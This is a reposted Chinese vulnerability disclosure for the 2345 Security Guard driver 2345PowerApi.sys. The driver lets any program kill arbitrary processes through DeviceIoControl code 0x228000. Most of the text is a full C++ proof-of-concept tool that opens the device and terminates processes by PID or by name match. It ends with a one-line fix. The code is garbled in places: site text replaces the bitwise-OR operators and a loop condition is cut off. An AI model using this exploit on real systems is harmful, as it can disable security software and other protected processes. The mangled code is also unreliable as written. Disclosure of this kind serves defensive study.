2345安全卫士PowerApi驱动内核权限杀任意进程漏洞
2345安全卫士采用最新的云计算技术以及全新的第三代查杀引擎,5重环绕式系统防护有效查杀各类新型流行木马。占用电脑磁盘空间小,闪电查杀更快更安全。
软件版本:1.3.0.5363
问题原因:2345PowerApi.sys没有做打开校验,任意程序可以通过DeviceIoControl操作这个驱动,包括但不限于杀任意进程。
// 2345.cpp : 定义控制台应用程序的入口点。//#include "stdafx.h"#include#include using namespace std;#include #define DEVICENAME L"\\\\.\\2345PowerApi"void PrintErrCodeMessage(char *preMsg){LPVOID lpMsgBuf;DWORD dwErrorCode = GetLastError();if(NULL!=preMsg)printf("%s\n",preMsg);if(FormatMessageA(FORMAT_MESSAGE_ALLOCATE_BUFFER (专业提供下载)
FORMAT_MESSAGE_FROM_SYSTEM (专业提供下载)
FORMAT_MESSAGE_IGNORE_INSERTS, //dwFlagsNULL, //lpSourcedwErrorCode, //dwMessageIdMAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),(LPSTR)&lpMsgBuf, //lpBuffer0, //nSizeNULL //Arguments)){printf("Fail Code: %d\r\n", dwErrorCode);printf("Fail Message: %s\r\n", lpMsgBuf);}else{printf("Fail Code: %d\r\n", dwErrorCode);printf("Failed to fetch the Error Message\r\n");}printf("Open Device Failed!\r\n");if(lpMsgBuf)LocalFree(lpMsgBuf);return;}int TerminateByPid(DWORD dwPid){char szOutBuf[100] = {0};DWORD nOutLen = sizeof(szOutBuf);HANDLE hDevice = CreateFileW( DEVICENAME , GENERIC_READ (专业提供下载)
GENERIC_WRITE, FILE_SHARE_READ (专业提供下载)
FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL );if(hDevice == INVALID_HANDLE_VALUE){PrintErrCodeMessage("[CreateFileA]");goto end;}else{printf("Open Device Success!\r\n");}printf("press any key to continue!\n");getchar();BOOL ret = DeviceIoControl(hDevice, 0x228000,&dwPid,sizeof(dwPid),szOutBuf,// out_buffernOutLen,// out_buffer_len = 0&nOutLen,// NULL);if(!ret) { PrintErrCodeMessage("[DeviceIoControl]");goto end;}elseprintf("DeviceIoControl Successed!\n");end: CloseHandle(hDevice);return 0;}BOOL GetPidsByNameLike(IN char szProcName[],OUT vector&vPids){if(NULL==szProcName)return FALSE;HANDLE hProcessSnap = NULL;PROCESSENTRY32 pe32= {0};hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);if (hProcessSnap == (HANDLE)-1){return FALSE;}pe32.dwSize = sizeof(PROCESSENTRY32);if(Process32First(hProcessSnap, &pe32)){do{if(NULL!=strstr(pe32.szExeFile,szProcName)){vPids.push_back(pe32.th32ProcessID);}}while (Process32Next(hProcessSnap, &pe32));}CloseHandle (hProcessSnap);return TRUE;}int TerminateByNL(char szNL[]){vector vPids;char szOutBuf[100] = {0};DWORD nOutLen = sizeof(szOutBuf);HANDLE hDevice = CreateFileW( DEVICENAME , GENERIC_READ (专业提供下载)
GENERIC_WRITE, FILE_SHARE_READ (专业提供下载)
FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL );if(hDevice == INVALID_HANDLE_VALUE){PrintErrCodeMessage("[CreateFileA]");goto end;}else{printf("Open Device Success!\r\n");}printf("press any key to continue!\n");getchar();GetPidsByNameLike(szNL,vPids);for(int i=0;i<>
{DWORD dwPid = vPids[i];printf("NL:%s , Pid:%u\n",szNL,vPids[i]);BOOL ret = DeviceIoControl(hDevice, 0x228000,&dwPid,sizeof(dwPid),szOutBuf,// out_buffernOutLen,// out_buffer_len = 0&nOutLen,// NULL);if(!ret) { PrintErrCodeMessage("[DeviceIoControl]");goto end;}elseprintf("DeviceIoControl Successed!\n");}end:CloseHandle(hDevice);return 0;}void Useage(){printf("使用方法,如下例子:\n");printf(" 2345terminate -pid xxx\n");printf(" 2345terminate -namelike xxx\n");}int _tmain(int argc, _TCHAR* argv[]){ if(argc!=3){Useage();return -1;}if(0==strcmp(argv[1],"-pid"))TerminateByPid(atoi(argv[2]));else if(0==strcmp(argv[1],"-namelike"))TerminateByNL(argv[2]);else{Useage();return -1;}return 0;}
解决方案:
做好驱动的打开校验
就爱阅读www.92to.com网友整理上传,为您提供最全的知识大全,期待您的分享,转载请注明出处。2345安全卫士友情提醒:建议每7日进行漏洞修复,及时修复漏洞可保证系统安全。
……